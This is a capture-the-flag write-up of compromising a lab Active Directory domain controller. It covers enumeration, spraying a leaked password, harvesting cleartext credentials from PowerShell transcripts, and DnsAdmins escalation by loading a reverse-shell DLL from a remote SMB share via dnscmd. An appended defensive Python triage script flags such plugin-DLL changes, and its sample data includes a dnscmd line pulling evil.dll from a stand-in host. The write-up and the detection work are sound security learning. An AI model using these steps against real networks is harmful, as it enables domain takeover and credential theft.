This is the first in a series of domain controllers I was able to compromise on Hack The Box. At the time of this writing the box has been retired, allowing me to post how I did reconnaissance, enumeration, initial foothold, and privilege escalation. I hope you enjoy reading this as much as I enjoyed the challenge of hacking this box!
I used the following nmap scan to detect open ports and services:
nmap -A -T4 -p- 10.10.10.169
Some important ports to note:
636/TCP LDAP over SSL
3268/TCP LDAP Global Catalog (tells us we are definitely dealing with a domain controller)
5985/TCP WinRM 2.0 (this is important later)
To start enumerating users I will run enum4linux in Kali and dump the output to a text file for review.
enum4linux 10.10.10.169 > results.txt
Feel free to read more about this tool here: http://labs.portcullis.co.uk/application/enum4linux/
I notice that there is a password in the description field for Marko Novak.
This is good for two reasons: we can attempt to log in as Marko with that password, and we can also use hydra to spray that password across every account one single time.
So I will attempt to log in as Marko:
Since we were unsuccessful, we will spray this password across all user accounts detected by enum4linux. It's easiest to put the account names into a single txt file and spray as seen below:
We have one successful login for melanie over SMB, which is great. We have active credentials for this system.
At this point we have a valid password for melanie. Next we will need to set up Evil-WinRM in Kali since it is not installed. Recall that earlier we detected WinRM on port 5985 as open. With a credential or hash we can immediately drop a shell.
Evil-WinRM can easily be installed with the following command.
Next, let's log in as melanie.
Next, let's check what rights melanie has on the domain. It's a bummer that she doesn't have many rights, so let's do some privilege escalation reconnaissance.
Since I am a PowerShell guy, I like to start by navigating through the file system from the root of the drive and looking for hidden directories that may be interesting. You can use dir -Hidden to find them:
One hidden directory that stands out is called PSTranscripts, short for PowerShell transcription logging. In my humble opinion you should never turn PowerShell transcription on for a domain. Part of the reason is that the output is not protected from non-administrators; you will see in a moment why this is bad.
Digging down into the directories, we stumble across a txt file.
Let's go ahead and type it out.
In the transcription logs it looks like Ryan is being good about making backups. He also gave us his password in cleartext.
Cool. So let's log in as Ryan next with Evil-WinRM and get the groups he belongs to. As you will see below, we now have credentials for a DNS admin. Having DnsAdmins rights is money, and I will explain why in a moment.
3. Privilege Escalation
A quick Google search yields an excellent article from Sean Metcalf:
From DNSAdmins to Domain Admin, When DNSAdmins is More than Just DNS Administration
According to the article, a member of DnsAdmins can use dnscmd to register a DLL of their choosing as a server-level plugin. Here is the command:
dnscmd.exe /config /serverlevelplugindll \\path\to\dll
So we will make our own malicious DLL with msfvenom. A few housekeeping items on this command:
- It specifies a Windows x64 reverse shell, not a Meterpreter shell (although we could do that).
- My host IP at the time was 10.10.14.7, and I am telling the reverse shell to call back on port 4444 to the listener I will set up.
Now that we have a DLL created, we need to get it onto the target domain controller. We will do so by serving it from an SMB share on our Kali Linux box and having the DNS service load the DLL over SMB, which gives us a reverse shell back to our Kali box via netcat.
DLL injection via SMB, followed by restarting the DNS service:
Reverse shell achieved through netcat listener:
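From the defender's side, the privilege-escalation step above leaves a distinctive trace: the DLL path is written to the DNS service's ServerLevelPluginDll registry value and the dnscmd command line records it. The Python triage below is an added example, not part of this writeup, that ranks such events from constructed registry and process telemetry (Sysmon-style fields, the CONTOSO accounts and the EXAMPLE-HOST share are all assumptions/placeholders), rating a UNC path like the one used in this box highest.

```python
import re
from dataclasses import dataclass

# Registry value the Windows DNS Server service reads at start-up to locate a
# server-level plugin DLL; it is what dnscmd /config /serverlevelplugindll sets.
DNS_PLUGIN_VALUE = r"HKLM\SYSTEM\CurrentControlSet\Services\DNS\Parameters\ServerLevelPluginDll"
# A UNC path means the DNS service will pull the DLL from a remote SMB share.
UNC_PATH = re.compile(r"^\\\\[^\\]+\\")
DNSCMD_PLUGIN = re.compile(r"dnscmd(?:\.exe)?\s.*?/config\s+/serverlevelplugindll\s+\"?([^\s\"]*)", re.IGNORECASE)

@dataclass
class Event:
    source: str     # "registry" (e.g. Sysmon event 13) or "process" (e.g. Sysmon event 1)
    user: str       # account that made the change or started the process
    target: str     # registry value path, or the full process command line
    data: str = ""  # new registry data (the DLL path) for registry events

def plugin_path(ev):
    """Return the DLL path an event sets for the DNS plugin, or None if unrelated."""
    if ev.source == "registry" and ev.target.lower() == DNS_PLUGIN_VALUE.lower():
        return ev.data.strip('"')
    if ev.source == "process":
        m = DNSCMD_PLUGIN.search(ev.target)
        if m:
            return m.group(1)
    return None

def triage(events):
    """Rank every event that changes the DNS plugin DLL; legitimate use is rare."""
    findings = []
    for ev in events:
        path = plugin_path(ev)
        if path is None:
            continue
        if path == "":
            severity = "info"    # value cleared, often post-exploitation cleanup
        elif UNC_PATH.match(path) or not path.lower().startswith("c:\\windows\\system32\\"):
            severity = "high"    # remote share or a non-system location
        else:
            severity = "medium"  # still review: who approved a DNS plugin?
        findings.append((severity, ev.user, path))
    return findings

# Constructed sample telemetry (not from the box or any real host).
SAMPLE_EVENTS = [
    Event("registry", "CONTOSO\\svc-dns", DNS_PLUGIN_VALUE, r"C:\Windows\System32\dnsplugin.dll"),
    Event("process", "CONTOSO\\ryan", r"dnscmd.exe /config /serverlevelplugindll \\EXAMPLE-HOST\share\evil.dll"),
    Event("registry", "CONTOSO\\ryan", DNS_PLUGIN_VALUE, ""),
]
```

Running triage(SAMPLE_EVENTS) yields one medium, one high and one info finding; the high one is the remote-share load that this box's escalation relies on.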
I really enjoyed this Active Directory box. This one is somewhat realistic, especially the privilege escalation. Adding the PowerShell transcription was a nice touch too, as it pointed to the weaknesses of doing full-scale PowerShell logging without protecting the output.